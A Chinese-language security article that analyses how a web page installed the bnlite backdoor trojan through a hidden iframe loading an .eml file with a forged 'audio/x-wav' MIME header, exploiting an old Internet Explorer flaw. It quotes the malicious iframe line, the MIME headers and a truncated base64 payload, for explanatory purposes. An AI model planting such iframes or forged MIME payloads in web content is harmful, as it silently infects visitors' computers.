恶意代码与网络安全(3)
注:给你下套的人可以自己设定这个木马的启动键名和注册文件名,注册文件名也就是运行时进程里的名称,因此大家看到的结果可能不相同。
运行金山毒霸,报告发现“backdoor bnlite”,哦,原来是木马bnlite服务端改名为wincfg.exe。别看这个木马服务端程序不大(仅有6.5K),但它的功能可不少:具有ICQ通报功能、远程删除服务端功能、设定端口和运行名称、上传下载……如果你中了该木马,那么木马控制端完全可以通过这个木马在你的电脑上建立一个隐藏的FTP服务器,别人就有最大权限进入你的电脑了!这样控制你的电脑将非常容易!
木马是如何下载到浏览了该主页的计算机中、并运行起来的呢?在IE中点击“工具”→“Internet选项”→“安全”→“自定义安全级别”,将ActiveX相关选项全部都禁用,再浏览该网页,wincfg.exe还是下载并运行了!看来这和ActiveX无关。在“自定义安全级别”中有关文件下载的选项都禁止,再浏览该网页,这回wincfg.exe不再下载了。
二、问题揭示
我们来看看wincfg.exe是如何下载到浏览者计算机上的,在该网页上点击鼠标右键,选择其中的“查看源代码”,在网页代码最后面发现了可疑的语句:
<iframe src=wincfg.eml width=1 height=1>
注意到其中的“wincfg.eml”了吗?大家都知道eml为邮件格式,网页中要eml文件干什么呢?非常可疑!在IE浏览器中输入:http//shirf.51.net/wincfg.eml,再看看任务管理器,wincfg.exe进程又回来了,原来问题就在这个文件上!既然问题在这文件上,当然得想办法得到这个文件看看了。用蚂蚁把文件下载下来,鼠标刚点上去,wincfg.exe又被执行了,真是阴魂不散啊!
打开wincfg.eml,发现其关键内容如下:
Content-Type audio/x-wav name=“wincfg.exe” ★这一句定义了文件名称,在此为wincfg.exe
Content-Transfer-Encoding base64 ★定义了代码格式为base64
Content-ID <THE-CID> ★从这里开始才是代码的起步
TVqQAAMAAAAEAAAA//8AAL……以下删掉一大节 ★这些是wincfg.exe经过base64编码的内容
上面加了“★”的部分为注释内容。这个以base64方式编码的文件,会在你浏览网页时编译成wincfg.exe文件并运行,这就是浏览该网页会中木马的原因!至此我就明白了,其实,所谓的浏览网页会中木马,只是网页制作者利用了微软IE浏览器中存在的漏洞进行攻击的一个案例而已,说白了就是利用了错误的MIMEMultipurpose Internet Mail Extentions,多用途的网际邮件扩充协议头进行攻击。
内容版权声明:除非注明,否则皆为本站原创文章。